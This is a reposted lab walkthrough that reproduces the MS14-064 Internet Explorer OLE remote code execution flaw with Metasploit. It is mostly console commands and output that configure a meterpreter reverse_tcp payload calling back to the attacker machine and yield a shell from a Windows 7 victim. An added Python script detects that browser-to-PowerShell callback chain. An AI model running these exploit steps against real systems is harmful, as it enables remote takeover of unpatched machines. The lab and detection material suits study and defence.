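Reproducing the MS14-064 vulnerability

Background

MS14-064 is a remote code execution vulnerability in Microsoft Windows OLE. OLE (Object Linking and Embedding) is a technology that lets applications share data and functionality. A remote attacker can exploit this vulnerability to execute arbitrary code through a crafted website. It affects all versions from Win95 + IE3 through Win10 + IE11.

Module: exploit/windows/browser/ms14_064_ole_code_execution

Reproduction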

System   IP
Linux    10.7.10.43
win7     10.7.10.49

msf6 > search ms14-064

Matching Modules
================

   #  Name                                                       Disclosure Date  Rank       Check  Description
   -  ----                                                       ---------------  ----       -----  -----------
   0  exploit/windows/browser/ms14_064_ole_code_execution        2014-11-13       good       No     MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution
   1  exploit/windows/fileformat/ms14_064_packager_python        2014-11-12       excellent  No     MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python
   2  exploit/windows/fileformat/ms14_064_packager_run_as_admin  2014-10-21       excellent  No     MS14-064 Microsoft Windows OLE Package Manager Code Execution


Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/fileformat/ms14_064_packager_run_as_admin                                                                                                     

msf6 > use exploit/windows/browser/ms14_064_ole_code_execution
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > ifconfig
[*] exec: ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.7.10.43  netmask 255.255.255.0  broadcast 10.7.10.255
        inet6 fe80::20c:29ff:fe3d:e7e0  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:3d:e7:e0  txqueuelen 1000  (Ethernet)
        RX packets 72244  bytes 6467761 (6.1 MiB)
        RX errors 0  dropped 34923  overruns 0  frame 0
        TX packets 51553  bytes 7628452 (7.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1380  bytes 120208 (117.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1380  bytes 120208 (117.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set AllowPowershellPrompt true
AllowPowershellPrompt => true
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > show options 

Module options (exploit/windows/browser/ms14_064_ole_code_execution):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   AllowPowershellPrompt  true             yes       Allow exploit to try Powershell
   Retries                true             no        Allow the browser to retry the module
   SRVHOST                0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT                8080             yes       The local port to listen on.
   SSL                    false            no        Negotiate SSL for incoming connections
   SSLCert                                 no        Path to a custom SSL certificate (default is randomly generated)
   TRYUAC                 false            yes       Ask victim to start as Administrator
   URIPATH                                 no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.7.10.43       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP


msf6 exploit(windows/browser/ms14_064_ole_code_execution) > exploit 

Get the URL that the module prints, open it on the win7 machine, and a shell comes back.
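For the defending side, the chain reproduced above (browser loads a page from SRVHOST:SRVPORT, the exploit tries PowerShell, the host connects back to LHOST:LPORT) can be hunted in endpoint telemetry. The following is an added example, not part of the original post or of Metasploit; the event schema, field names and sample events are constructed for illustration, and only the addresses and ports are taken from the lab above.

```python
from datetime import datetime, timedelta

BROWSERS = {"iexplore.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Constructed sample telemetry from one endpoint (hypothetical schema).
# "proc" = process creation, "net" = outbound connection.
SAMPLE_EVENTS = [
    {"ts": "2021-03-05T10:00:01", "kind": "net", "pid": 1200,
     "image": "iexplore.exe", "dst": "10.7.10.43", "dport": 8080},
    {"ts": "2021-03-05T10:00:03", "kind": "proc", "pid": 2344, "ppid": 1200,
     "image": "powershell.exe", "parent": "iexplore.exe"},
    {"ts": "2021-03-05T10:00:05", "kind": "net", "pid": 2344,
     "image": "powershell.exe", "dst": "10.7.10.43", "dport": 4444},
    {"ts": "2021-03-05T10:05:00", "kind": "net", "pid": 1200,
     "image": "iexplore.exe", "dst": "10.7.10.1", "dport": 80},
    {"ts": "2021-03-05T10:06:00", "kind": "proc", "pid": 3000, "ppid": 900,
     "image": "powershell.exe", "parent": "explorer.exe"},
]

def _ts(event):
    return datetime.fromisoformat(event["ts"])

def find_browser_spawn_chains(events, window=timedelta(seconds=60)):
    """Flag script interpreters started by a browser; raise severity when the
    host then connects back to the server the browser had just visited."""
    nets = [e for e in events if e["kind"] == "net"]
    findings = []
    for child in events:
        if child["kind"] != "proc":
            continue
        if (child["image"].lower() not in INTERPRETERS
                or child["parent"].lower() not in BROWSERS):
            continue
        t0 = _ts(child)
        # (host, port) pairs the parent browser contacted shortly before the spawn.
        visited = {(e["dst"], e["dport"]) for e in nets
                   if e["pid"] == child["ppid"]
                   and timedelta(0) <= t0 - _ts(e) <= window}
        hosts = {dst for dst, _ in visited}
        # Later connections to the same host on a port the browser did not use.
        callbacks = sorted({(e["dst"], e["dport"]) for e in nets
                            if timedelta(0) <= _ts(e) - t0 <= window
                            and e["dst"] in hosts
                            and (e["dst"], e["dport"]) not in visited})
        findings.append({"pid": child["pid"], "image": child["image"],
                         "severity": "high" if callbacks else "medium",
                         "callbacks": callbacks})
    return findings

if __name__ == "__main__":
    for finding in find_browser_spawn_chains(SAMPLE_EVENTS):
        print(finding)
```

A browser-spawned interpreter alone is reported as medium; it becomes high only when a second connection to the same server follows on a different port.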

Reference articles:
https://www.cnblogs.com/5301z/p/6714300.html
https://blog.csdn.net/nzjdsds/article/details/81912349

Reposted from: blog.csdn.net/p_utao/article/details/114401118